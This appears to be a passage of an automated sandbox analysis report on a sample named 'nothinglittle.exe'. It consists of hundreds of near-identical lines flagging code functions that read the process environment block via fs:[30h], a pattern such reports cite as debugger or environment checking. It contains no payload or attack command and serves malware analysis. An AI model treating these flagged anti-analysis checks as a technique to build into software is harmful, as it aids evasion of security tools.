Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012AA309 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012AA309 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012AA309 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012AA309 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012AA309 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012AA309 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012AA309 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012AA309 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012AA309 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012AA309 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012AA309 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012AA309 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012AA309 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012AA309 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012AA309 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012AA309 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012AA309 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012AA309 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012AA309 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0134131B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01316365 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01316365 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01316365 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0129F370 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0129F370 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0129F370 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0128F358 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B138B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B138B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B138B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0133D380 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012BB390 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B2397 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0134138A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B03E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B03E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B03E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B03E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B03E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B03E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_013323E3 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_013323E3 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_013323E3 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B53C5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_013053CA mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_013053CA mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012AA229 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012AA229 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012AA229 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012AA229 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012AA229 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012AA229 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012AA229 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012AA229 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012AA229 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01288239 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01288239 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01288239 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012AB236 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012AB236 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012AB236 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012AB236 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012AB236 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012AB236 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01341229 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01285210 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01285210 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01285210 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01285210 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0133B260 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0133B260 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012C927A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01314257 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01289240 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01289240 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01289240 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01289240 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012962A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012962A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012962A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012962A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012852A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012852A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012852A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012852A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012852A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B12BD mov esi, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B12BD mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B12BD mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0134129A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012BD294 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012BD294 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0134B2E8 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0134B2E8 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0134B2E8 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0134B2E8 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012812D4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0130A537 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012BF527 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012BF527 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012BF527 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0134E539 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01343518 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01343518 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01343518 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0128751A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0128751A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0128751A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0128751A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01289515 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012AC577 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012AC577 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0128354C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0128354C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01303540 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B35A1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B65A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B65A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B65A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_013505AC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_013505AC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B2581 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B2581 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B2581 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B2581 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0134B581 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0134B581 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0134B581 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0134B581 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01283591 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B95EC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0129D5E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0129D5E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012895F0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012895F0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012815C1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01284439 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0129B433 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0129B433 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0129B433 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012A2430 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012A2430 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0135740D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0135740D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0135740D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01288410 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012A746D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01288466 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01288466 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012AB477 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012AB477 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012AB477 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012AB477 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012AB477 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012AB477 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012AB477 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012AB477 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012AB477 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012AB477 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012AB477 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012AB477 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012BA44B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0131C450 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0131C450 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01358450 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01289450 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012914A9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012914A9 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_013164B5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_013164B5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_013134A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_013134A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_013134A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012934B1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012934B1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012BD4B0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01344496 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01344496 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01344496 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01344496 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01344496 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01344496 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01344496 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01344496 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01344496 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01344496 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01344496 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01344496 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01344496 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01281480 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0129849B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0128649B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0128649B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B84E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B84E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B84E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B84E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B84E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B84E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_013414FB mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012AB73D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012AB73D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01286730 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01286730 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01286730 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012BE730 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012BA70E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012BA70E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012BC707 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012BC707 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012BC707 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0135070D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0135070D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B4710 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012AF716 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012BD715 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012BD715 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01288760 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01288760 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01288760 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01288760 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01288760 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01288760 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01288760 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01288760 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01288760 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01288760 mov eax, dword ptr fs:[00000030h]
